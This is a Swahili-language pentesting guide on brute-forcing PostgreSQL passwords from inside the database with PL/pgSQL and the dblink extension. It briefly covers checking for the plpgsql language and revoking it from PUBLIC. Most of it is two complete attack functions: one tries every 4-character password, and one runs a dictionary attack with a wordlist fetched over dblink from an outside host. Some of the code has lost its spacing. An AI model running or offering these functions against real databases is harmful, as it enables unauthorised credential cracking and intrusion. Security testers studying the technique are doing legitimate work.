PL/pgSQL ni lugha ya programu iliyo na vipengele vyote ambayo inapanua uwezo wa SQL kwa kutoa udhibiti wa taratibu ulioimarishwa. Hii inajumuisha matumizi ya mizunguko na muundo mbalimbali wa udhibiti. Kazi zilizoundwa katika lugha ya PL/pgSQL zinaweza kuitwa na taarifa za SQL na triggers, kupanua wigo wa operesheni ndani ya mazingira ya hifadhidata.
Unaweza kutumia lugha hii ili kuomba PostgreSQL kujaribu nguvu akidi za watumiaji, lakini lazima iwepo kwenye hifadhidata. Unaweza kuthibitisha uwepo wake kwa kutumia:
SELECT lanname,lanacl FROM pg_language WHERE lanname ='plpgsql';lanname | lanacl---------+---------plpgsql |
Kwa default, kuunda kazi ni haki inayotolewa kwa PUBLIC, ambapo PUBLIC inarejelea kila mtumiaji kwenye mfumo huo wa hifadhidata. Ili kuzuia hili, msimamizi angeweza kuondoa haki ya USAGE kutoka kwa eneo la PUBLIC:
REVOKE ALL PRIVILEGES ONLANGUAGE plpgsql FROM PUBLIC;
Katika kesi hiyo, ombi letu la awali lingetoa matokeo tofauti:
SELECT lanname,lanacl FROM pg_language WHERE lanname ='plpgsql';lanname | lanacl---------+-----------------plpgsql | {admin=U/admin}
Kumbuka kwamba ili script ifanye kazi kazi dblink inahitaji kuwepo. Ikiwa haipo unaweza kujaribu kuunda hiyo na
CREATE EXTENSION dblink;
Password Brute Force
Hapa kuna jinsi unavyoweza kufanya brute force ya nywila ya herufi 4:
//Create the brute-forcefunctionCREATE OR REPLACEFUNCTIONbrute_force(host TEXT, port TEXT,username TEXT, dbname TEXT) RETURNSTEXTAS$$DECLAREword TEXT;BEGINFOR a IN65..122LOOPFOR b IN65..122LOOPFOR c IN65..122LOOPFOR d IN65..122LOOPBEGINword := chr(a) || chr(b) || chr(c) || chr(d);PERFORM(SELECT*FROM dblink(' host='|| host ||' port='|| port ||' dbname='|| dbname ||' user='|| username ||' password='|| word,'SELECT 1')RETURNS (i INT));RETURN word;EXCEPTIONWHEN sqlclient_unable_to_establish_sqlconnectionTHEN-- do nothingEND;ENDLOOP;ENDLOOP;ENDLOOP;ENDLOOP;RETURNNULL;END;$$ LANGUAGE'plpgsql';//Call the functionselect brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
Nakili kwamba hata kujaribu nguvu kwa herufi 4 kunaweza kuchukua dakika kadhaa.
Unaweza pia kupakua orodha ya maneno na kujaribu tu nywila hizo (shambulio la kamusi):
//Create the functionCREATE OR REPLACEFUNCTIONbrute_force(host TEXT, port TEXT,username TEXT, dbname TEXT) RETURNSTEXTAS$$BEGINFOR word IN (SELECT word FROM dblink('host=1.2.3.4user=namepassword=qwertydbname=wordlists','SELECT word FROM wordlist')RETURNS (word TEXT)) LOOPBEGINPERFORM(SELECT*FROM dblink(' host='|| host ||' port='|| port ||' dbname='|| dbname ||' user='|| username ||' password='|| word,'SELECT 1')RETURNS (i INT));RETURN word;EXCEPTIONWHEN sqlclient_unable_to_establish_sqlconnection THEN-- do nothingEND;ENDLOOP;RETURNNULL;END;$$ LANGUAGE'plpgsql'-- Call the functionselect brute_force('127.0.0.1', '5432', 'postgres', 'postgres');